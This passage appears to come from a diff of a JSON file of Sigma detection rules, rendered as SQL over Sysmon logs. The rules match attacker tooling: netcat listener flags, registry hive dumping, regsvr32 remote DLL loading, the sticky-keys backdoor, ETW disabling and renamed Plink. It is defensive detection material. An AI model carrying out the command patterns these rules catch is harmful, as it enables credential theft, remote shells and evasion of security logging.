'%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage 
LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_mssql_susp_child_process.yml" + }, + { + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and 
SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND 
CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR Image LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Run PowerShell Script from ADS", + "id": 
"45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate ncat use" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' 
OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", - "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. 
Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1555.004" + "attack.t1003.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE 
'\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE 
'%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", - "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Potential BearLPE Exploitation", - 
"id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "status": "experimental", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' 
OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "cve.2022.29072" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
